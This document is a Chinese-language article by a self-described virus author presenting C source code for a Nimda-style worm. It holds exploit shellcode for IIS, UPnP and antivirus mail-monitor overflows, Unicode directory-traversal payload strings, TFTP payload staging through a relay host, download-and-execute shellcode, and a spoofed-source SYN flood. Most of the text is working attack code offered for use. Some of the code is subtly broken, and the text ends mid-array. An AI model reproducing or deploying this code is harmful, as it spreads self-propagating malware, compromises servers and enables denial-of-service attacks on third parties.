1.0.0一些声明
本文并不是使用nimda的源代码来讲座的,本文的作者是根据对nimda的行为分析加上作者本人的功底自悟写出来的
本文提供的程序代码均在VC5.0/6.0+win9x/me/2000+sp1/xp/nt4.0+sp4下测试通过
1.0.1作者介绍
真实姓名:郭宏硕
网上姓名:Squirrel
真实地址:大连市第二十四中学高一年级
真实年龄:17(吃惊吗!)
病毒作品:太多了。。。(把大家害苦了)
邮编:116001
e-mail:suruixuan1@sina.com(属于苏睿暄病毒研发小组)
QQ:28386834
1.1.1
Unicode漏洞
最近网上关于它的东西有不少,所以我就不费口舌了。
直接从网上便可得到许多的资料
1.1.2
WinME/XP UPNP 漏洞
很多黑客网站上都有它的资料,我就不在这里说了。有漏洞机器大约有30000来台,本次新增
1.1.3
金山毒霸2001的邮件监控(mailmon.exe)存在缓冲溢出漏洞
tombkeeper说的非常清楚,我就不多说了。这样的机器就更多了。本次新增
1.1.4
IIS5.0 .idq 漏洞
前些日子的Redcode就用的这个。本次新增
1.1.5
IIS4.0的缓冲漏洞
古老的漏洞了,不过仍有有这个漏洞的机器。本次新增
1.2 TFTP
这个东西用TFTPd.exe就行了,不过我这里使用TFTP.DLL作服务器。原因是我不想让人发现它的进程。这一次还利用了FTP服务器www.wormworld.com作中转。本次改进
1.4 Riched20.dll
其实就是把%system%//Riched20.dll的结构导出来,修改Dllmain的代码,把病毒体从它的体内分离出来。
这东西写起来即麻烦又废时间,索性使用另外的方法代替了
riched20()函数的内容
HANDLE hFile=CreateFile("riched20.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
//printf("\nCreate file %s failed:%d",RemoteFilePath,GetLastError());
return -1
}
//写文件内容
DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
while(dwSize>dwIndex)
{
if(!WriteFile(hFile,&richedpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
{
//printf("\nWrite file %s failed:%d","riched20.DLL",GetLastError());
return -1
}
dwIndex+=dwWrite;
}
//关闭文件句柄
CloseHandle(hFile);
1.5 Base64
看到代码就懂了
1.6 pe病毒部分
这是新功能。本次新增
1.7 SYNflood
分布式洪水报文攻击。本次新增。
1.8 主程序代码
------------------------------------<nimda.cpp>--------------------------------------------------
file://Don't forget to link with wsock32.lib :-o
typedef struct _iphdr{//定义IP首部
unsigned char h_verlen;//4位首部长度,4位IP版本号
unsigned char tos;//
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned short ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;
struct{//定义TCP伪首部
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}psd_header;
typedef struct _tcphdr{//定义TCP首部
USHORT th_sport;
USHORT th_dpost;
unsigned int ht_seq;
unsigned int ht_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCP_HEADER;
USHORT checksum(USHORT *buffer,int size){//计算验和的子函数
unsigned long chsum=0;
while(size>1){
chsum+=*buffer++;
size-=sizeof(USHORT);
}
if(size){
chsum+=*(UCHAR*)buffer;
}
chsum=(chsum>>16)+(chsum & 0xffff);
chsum+=(chsum>>16);
return (USHORT)(~chsum);
}
int WINAPI flood()
{
int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;
int TimeOut=2000,SendSEQ=0;
char SendBuf[128]=;
char RecvBuf[65535]=;
WSADATA wsaData;
SOCKET SockRaw=(SOCKET)NULL;
struct sockaddr_in DestAddr;
IP_HEADER ip_header;
TCP_HEADER tcp_header;
//初始化SOCK_RAW
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
//fprintf(stderr,"WSAStartup failed:%d\n",ErrorCode);
return 0
}
//建立套接字
SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
if(SockRaw==INVALID_SOCKET){
//fprintf(stderr,"WSASocket() failed:%d\n",WSAGetLastError());
return 0
}
flag=TRUE;
//设置IP_HDRINCL以自己填充IP首部
ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if(ErrorCode==SOCKET_ERROR)//printf("Set IP_HDRINCL Error!\n");
__try{
ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char *)&TimeOut,sizeof(TimeOut));
if(ErrorCode==SOCKET_ERROR){
//fprintf(stderr,"Failed to set send TimeOut:%d\n",WSAGetLastError());
return 0
}
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);
FakeIpNet=inet_addr(FAKE_IP);
FakeIpHost=ntohl(FakeIpNet);
//填充IP首部
ip_header.h_verlen =(4<<4 | sizeof(ip_header)/sizeof(unsigned long));//高四位IP版本号
ip_header.total_len =htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));//16位总长度
ip_header.ident =1;
ip_header.frag_and_flags =0;
ip_header.ttl =128;
ip_header.proto =IPPROTO_TCP;
ip_header.checksum =0;
ip_header.sourceIP =htonl(FakeIpHost+SendSEQ);
ip_header.destIP =inet_addr(SYN_DEST_IP);
//填充TCP首部
tcp_header.th_sport =htons(7000);
tcp_header.th_dpost =htons(8080);
tcp_header.ht_seq=htonl(SEQ+SendSEQ);
tcp_header.ht_ack=0;
tcp_header.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
tcp_header.th_flag =2;
tcp_header.th_win =htons(16384);
tcp_header.th_urp =0;
tcp_header.th_sum =0;
//填充TCP伪首部
psd_header.saddr=ip_header.sourceIP ;
psd_header.daddr=ip_header.destIP ;
psd_header.mbz=0;
psd_header.ptcl=IPPROTO_TCP;
psd_header.tcpl=htons(sizeof(tcp_header));
while(1){
//每发送1024个报文输出一个标示符
//printf(".");
for(counter=0;counter<1024;counter++){
if(SendSEQ++==65536)SendSEQ=1;//序列循环
//改IP首部
ip_header.checksum =0;
ip_header.sourceIP =htonl(FakeIpHost+SendSEQ);//32位源IP
//改TCP首部
tcp_header.ht_seq =htonl(SEQ+SendSEQ);//SYN序列号
tcp_header.th_sum =0;
//改TCP Pseudo Header
psd_header.saddr=ip_header.sourceIP ;
//计算TCP校验和,计算校验和时需要包括TCP pssudo header
memcpy(SendBuf,&psd_header,sizeof(psd_header));
memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
tcp_header.th_sum=checksum((USHORT*)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
//计算IP校验和
memcpy(SendBuf,&ip_header,sizeof(ip_header));
memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
memcpy(SendBuf+sizeof(ip_header),sizeof(tcp_header),0,4);
datasize=sizeof(ip_header)+sizeof(tcp_header);
//填充发送缓冲区
memcpy(SendBuf,&ip_header,sizeof(ip_header));
//发送
ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*)&DestAddr,sizeof(DestAddr));
if(ErrorCode==SOCKET_ERROR)//printf("\Send Error:%d\n",GetLastError());
}//end for
}//end while
}//end try
__finally{
if(SockRaw!=INVALID_SOCKET)closesocket(SockRaw);
WSACleanup();
}
return 0;
}//end flood
HMODULEhKERNEL32 ;
FARPROCa_RegisterServiceProcess ;
HMODULEhMPR ;
FARPROCa_WNetOpenEnum ;
FARPROCa_WNetCloseEnum ;
FARPROCa_WNetEnumResource ;
HMODULEhADVAPI ;
FARPROCa_RegOpenKeyExA ;
FARPROCa_RegQueryValueExA ;
FARPROCa_RegCloseKey ;
HINSTANCEhWINSOCK ;
FARPROCa_WSAStartup ;
FARPROCa_inet_addr ;
FARPROCa_gethostbyaddr ;
FARPROCa_gethostbyname ;
FARPROCa_htons ;
FARPROCa_socket ;
FARPROCa_connect ;
FARPROCa_send ;
FARPROCa_recv ;
FARPROCa_closesocket ;
FARPROCa_WSACleanup ;
SOCKETconn_socket ;
charszSMTPname[ 256] ;
charszSMTPaddr[ 256] ;
charszMAIL_FROM[ 256] ;
charszRCPT_TO[ 256] ;
intFound ;
BOOLInetActivated ;
BOOLMailDone ;
long WINAPIL0calThread( long) ;
long WINAPIRem0teThread( long) ;
long WINAPIMailThread( long) ;
voidNetW0rming( LPNETRESOURCE) ;
voidRem0teInfecti0n( char *) ;
BOOLstr2socket( char *, BOOL) ;
BOOLGetSMTP( char *, char *) ;
voidbase64_encode( const void *, int) ;
char*DecryptStr( char *) ;
voidFindPe0ple( char *) ;
voidWaitC0nnected( void) ;
BOOL CALLBACKEnumWindowsProc( HWND, LPARAM) ;
//金山毒霸漏洞代码
unsigned char eip[8] = JUMPESP;
unsigned char sploitx[] = {
0x90, 0x8b, 0xfc,
0x33, 0xc0, 0x50, 0xf7, 0xd0, 0x50, 0x59, 0xf2, 0xaf, 0x59, 0xb1, 0xc6,
0x8b, 0xc7, 0x48, 0x80, 0x30, 0x99, 0xe2, 0xfa, 0x33, 0xf6, 0x96, 0xbb,
0x99, 0xac, 0xb0, 0x42, 0xc1, 0xeb, 0x08, 0x56, 0xff, 0x13, 0x8b, 0xd0,
0xfc, 0x33, 0xc9, 0xb1, 0x0b, 0x49, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75,
0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe0, 0xff, 0x13, 0xab, 0x59, 0x5a,
0xe2, 0xec, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75, 0xf9, 0xb3, 0xac, 0x56,
0xff, 0x13, 0x8b, 0xd0, 0xfc, 0x33, 0xc9, 0xb1, 0x06, 0x32, 0xc0, 0xac,
0x84, 0xc0, 0x75, 0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe0, 0xff, 0x13,
0xab, 0x59, 0x5a, 0xe2, 0xec, 0x83, 0xc6, 0x05, 0x33, 0xc0, 0x50, 0x40,
0x50, 0x40, 0x50, 0xff, 0x57, 0xe8, 0x93, 0x6a, 0x10, 0x56, 0x53, 0xff,
0x57, 0xec, 0x6a, 0x02, 0x53, 0xff, 0x57, 0xf0, 0x33, 0xc0, 0x57, 0x50,
0xb0, 0x0c, 0xab, 0x58, 0xab, 0x40, 0xab, 0x5f, 0x48, 0x50, 0x57, 0x56,
0xad, 0x56, 0xff, 0x57, 0xc0, 0x48, 0x50, 0x57, 0xad, 0x56, 0xad, 0x56,
0xff, 0x57, 0xc0, 0x48, 0xb0, 0x44, 0x89, 0x07, 0x57, 0xff, 0x57, 0xc4,
0x33, 0xc0, 0x8b, 0x46, 0xf4, 0x89, 0x47, 0x3c, 0x89, 0x47, 0x40, 0x8b,
0x06, 0x89, 0x47, 0x38, 0x33, 0xc0, 0x66, 0xb8, 0x01, 0x01, 0x89, 0x47,
0x2c, 0x57, 0x57, 0x33, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50,
0x50, 0xad, 0x56, 0x33, 0xc0, 0x50, 0xff, 0x57, 0xc8, 0xff, 0x76, 0xf0,
0xff, 0x57, 0xcc, 0xff, 0x76, 0xfc, 0xff, 0x57, 0xcc, 0x48, 0x50, 0x50,
0x53, 0xff, 0x57, 0xf4, 0x8b, 0xd8, 0x33, 0xc0, 0xb4, 0x04, 0x50, 0xc1,
0xe8, 0x04, 0x50, 0xff, 0x57, 0xd4, 0x8b, 0xf0, 0x33, 0xc0, 0x8b, 0xc8,
0xb5, 0x04, 0x50, 0x50, 0x57, 0x51, 0x56, 0xff, 0x77, 0xa8, 0xff, 0x57,
0xd0, 0x83, 0x3f, 0x01, 0x7c, 0x22, 0x33, 0xc0, 0x50, 0x57, 0xff, 0x37,
0x56, 0xff, 0x77, 0xa8, 0xff, 0x57, 0xdc, 0x0b, 0xc0, 0x74, 0x2f, 0x33,
0xc0, 0x50, 0xff, 0x37, 0x56, 0x53, 0xff, 0x57, 0xf8, 0x6a, 0x50, 0xff,
0x57, 0xe0, 0xeb, 0xc8, 0x33, 0xc0, 0x50, 0xb4, 0x04, 0x50, 0x56, 0x53,
0xff, 0x57, 0xfc, 0x57, 0x33, 0xc9, 0x51, 0x50, 0x56, 0xff, 0x77, 0xac,
0xff, 0x57, 0xd8, 0x6a, 0x50, 0xff, 0x57, 0xe0, 0xeb, 0xaa, 0x50, 0xff,
0x57, 0xe4, 0x90, 0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
0x99, 0x0d, //port=148
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
0x0d, 0x0a};
//这段溢出代码是一段通用的溢出代码,只要改其中几个地方就可以用于任何一个程序的溢出,是ipxodi写的
//0xbb,0x99, 0xac, 0xb0, 0x42对应的汇编代码 mov ebx,42b0ach,是mailmon.exe中函数LoadLibraryA的入口地址
//可以用win32Dasm打开mailmon.exe查找LoadLibraryA,会看见:0040f7c2 ff15acb04200 Call dword ptr [0042b0ac]
//的字样,如果用于别的程序溢出,也可以这样查找并更改
//0xb3, 0xe0对应的汇编代码喂mov bl,e0h
//可以用win32Dasm打开mailmon.exe查找GetProcAddress,会看见:0041e2bf ff15acb04200 Call dword ptr [0042b0e0]
//的字样,它的地址和LoadLibraryA只最后一个字节不一样,所以mov bl,e0h
//0xb3, 0xac对应的汇编代码为mov bl,ac
//道理和上面一样
//WinME/XP UPNP 漏洞的shellcode声明
file://定义常量
int num=0;
int ExeDirNum=0;
HANDLE hSemaphore=NULL;
char *mybytes;
unsigned long sizemybytes;
MaxThread=100;//最大开100个线程扫描
file://下面定义漏洞数组
char *vers="KittyXP.a"//版本号
char *writer="Squirrel in Dalian"//作者?
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};
file://下面7个漏洞出现的目录,可以自己定义更多,但务必修改后改下面的for循环数字
char *ExeDirs[7]=;
unsigned char tftpdllbuff[]="";//这里存放的是Tftp.dll的二进制码
//unsigned char riched20dllbuff[]="";//这里存放的是riched20.dll的二进制码
file://声明函数
long GetLocalIP(void);//获得本机IP
DWORD WINAPI FindExeDir(LPVOID lp);//找到可执行目录
char *GetData(int SockFD);//获取SEND返回的数据
char * find(const char*pszSource,const char * pszKey);//在返回数据中查找指定字符串
DWORD WINAPI TFTP32();
//DWORD WINAPI Riched20()
int WINAPI redcode(char *argv[])
intWINAPI iis4(char *argv[])
intWINAPI xpmethd(char *argv[])
intWINAPI anitthd(char *argv[])
void WINAPI pevirus(char *argv[])
void WINAPI worm()
char *localpath;//system32的路径
char *exedir;//脚本路径
char* WebPath;//首页所存放的路径
//下面是关于IIS5.0 .idq 漏洞的声明
unsigned char shellcode[]=
"\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0"
"\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50"
"\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88"
"\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB"
"\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8"
"\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0"
"\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66"
"\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11"
"\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"
"\x8B\x46\xF8\xFF\xD0\x33\xC0"
"\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07"
"\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0"
"\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B"
"\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46"
"\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0"
"\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0";
unsigned char storage[]=
"\xEB\x02"
"\xEB\x4E"
"\xE8\xF9\xFF\xFF\xFF"
"msvcrt.ws2_32.socket.connect.recv.closesocket."
"_open._write._close._execl.";
unsigned char forwardjump[]=
"%u08eb";
unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
if((ip=inet_addr(name))==(-1))
{
if((he=gethostbyname(name))==0)
return 0;
memcpy(&ip,he->h_addr,4);
}
return ip;
}
int make_connection(char *address,int port)
{
struct sockaddr_in server,target;
int s,i,bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
memset((char *)&server,0,sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = 0;
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(address);
if(target.sin_addr.s_addr==0)
{
close(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctl(s,FIONBIO,&bf);
tv.tv_sec = 10;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
close(s);
return -3;
}
if(i==0)
{
close(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
close(s);
errno = bf;
return -5;
}
ioctl(s,FIONBIO,&bf);
return s;
}
int get_connection(int port)
{
struct sockaddr_in local,remote;
int lsock,csock,len,reuse_addr;
lsock = socket(AF_INET,SOCK_STREAM,0);
if(lsock<0)
{
// perror("socket");
return -1
}
reuse_addr = 1;
if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reuse_addr))<0)
{
//perror("setsockopt");
close(lsock);
return -1
}
memset((char *)&local,0,sizeof(local));
local.sin_family = AF_INET;
local.sin_port = htons(port);
local.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)
{
//perror("bind");
close(lsock);
return -1
}
if(listen(lsock,1)<0)
{
// perror("listen");
close(lsock);
return -1
}
retry:
len = sizeof(remote);
csock = accept(lsock,(struct sockaddr *)&remote,&len);
if(csock<0)
{
if(errno!=EINTR)
{
//perror("accept");
close(lsock);
return -1
}
else
goto retry;
}
close(lsock);
return csock;
}
unsigned long __stdcall doweb(void *inr) {
char buf[1024];
SOCKET in = *((SOCKET *)inr);
recv(in,buf,1024,0);
send(in,mybytes,sizemybytes,0);
closesocket(in);
return 0;
}
//下面是redcode的shellcode
// this is the sploit code written by Dark Spyrit, it downloads a file and runs it
char sploit[] = { 0x47,
0x45, 0x54, 0x20, 0x2F, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xB0, 0x87, 0x67, 0x68, 0xB0, 0x87, 0x67,
0x68, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x90, 0x33, 0xC0, 0x50, 0x5B, 0x53, 0x59, 0x8B,
0xDE, 0x66, 0xB8, 0x21, 0x02, 0x03, 0xD8, 0x32, 0xC0, 0xD7, 0x2C, 0x21, 0x88, 0x03, 0x4B,
0x3C, 0xDE, 0x75, 0xF4, 0x43, 0x43, 0xBA, 0xD0, 0x10, 0x67, 0x68, 0x52, 0x51, 0x53, 0xFF,
0x12, 0x8B, 0xF0, 0x8B, 0xF9, 0xFC, 0x59, 0xB1, 0x06, 0x90, 0x5A, 0x43, 0x32, 0xC0, 0xD7,
0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54,
0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0,
0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x53, 0xFF, 0x12, 0x8B, 0xF0, 0x5A, 0x33, 0xC9, 0x50,
0x58, 0xB1, 0x05, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4,
